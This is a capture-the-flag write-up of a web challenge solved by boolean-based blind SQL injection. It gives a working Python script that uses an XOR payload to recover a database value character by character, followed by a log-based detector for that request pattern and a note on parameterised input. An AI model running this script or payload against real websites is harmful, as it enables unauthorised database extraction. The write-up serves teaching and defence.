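[CISCN2019 North China Division Day2 Web1]Hack World 1
Opening the instance shows a POST input box that looks injectable.
A first guess is SQL injection. The universal-password test turned up nothing, and testing shows that a large number of SQL keywords are filtered.
Trying () produced bool(false), which confirms this is a boolean-based blind injection challenge.
and is blocked, so XOR (^) is used for the injection instead.
Build a payload script and run it:
The flag is obtained successfully: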
flag{a2f7089d-bd8c-4659-bcd6-9c3b3e4780dc}
Script attached:
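import requests
import time


def jiaoben(url, field_length=50, request_interval=0.01):
    result = ''
    for i in range(1, field_length + 1):
        # Binary search over the ASCII range for the character at position i
        max_val = 127
        min_val = 0
        while (max_val - min_val) > 1:
            mid_val = (max_val + min_val) // 2
            # XOR (^) stands in for the filtered `and`
            payload = f'1^(ascii(substr((select(flag)from(flag)),{i},1))>{mid_val})=1'
            response = requests.post(url, data={'id': payload})
            if 'Hello' in response.text:
                # Normal page returned: the character code is <= mid_val
                max_val = mid_val
            else:
                min_val = mid_val
            time.sleep(request_interval)
        result += chr(max_val)
        print(result)  # print the value recovered so far
    # The original referenced an undefined field_name here, which raised NameError
    print(f"Final result: {result}")
    return result


url = ''  # challenge instance URL (left empty in the original)
jiaoben(url)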
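
Seen from the server side, the script above leaves a distinctive trace: non-numeric id values that bisect a character code at one substring position after another. The detector below is an added example, not part of the original write-up; the (client IP, POST body) record format, the thresholds and the sample records are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlencode

# Shape of the write-up's payload: ...ascii(substr((...),<pos>,1))><threshold>...
PROBE = re.compile(r"ascii\(substr\(.*?,(\d+),1\)\)>(\d+)", re.I | re.S)


def find_blind_extraction(records, min_probes=5, min_positions=3):
    """records: iterable of (client_ip, raw_post_body) pairs (assumed log format).
    Returns {client_ip: [positions]} for clients whose `id` values compare one
    substring position against many thresholds, at several positions."""
    seen = defaultdict(lambda: defaultdict(set))  # ip -> position -> thresholds
    for ip, body in records:
        for value in parse_qs(body).get("id", []):
            if value.strip().isdigit():  # a plain integer is the expected input
                continue
            m = PROBE.search(value)
            if m:
                seen[ip][int(m.group(1))].add(int(m.group(2)))
    alerts = {}
    for ip, by_pos in seen.items():
        hot = sorted(p for p, t in by_pos.items() if len(t) >= min_probes)
        if len(hot) >= min_positions:
            alerts[ip] = hot
    return alerts


def constructed_records():
    """Constructed sample: two benign requests, then the request pattern the
    script sends while bisecting a constructed 5-character value."""
    recs = [("198.51.100.7", "id=1"), ("198.51.100.7", "id=2")]
    for pos, code in enumerate(b"flag{", start=1):  # constructed, not a real flag
        lo, hi = 0, 127
        while hi - lo > 1:
            mid = (lo + hi) // 2
            value = f"1^(ascii(substr((select(flag)from(flag)),{pos},1))>{mid})=1"
            recs.append(("203.0.113.9", urlencode({"id": value})))
            lo, hi = (mid, hi) if code > mid else (lo, mid)
    return recs


if __name__ == "__main__":
    print(find_blind_extraction(constructed_records()))
```

The same digit-only check the detector uses to skip benign requests is also the simplest fix on the application side: an id that must be an integer can be validated as one and bound as a query parameter, which makes the keyword filter unnecessary.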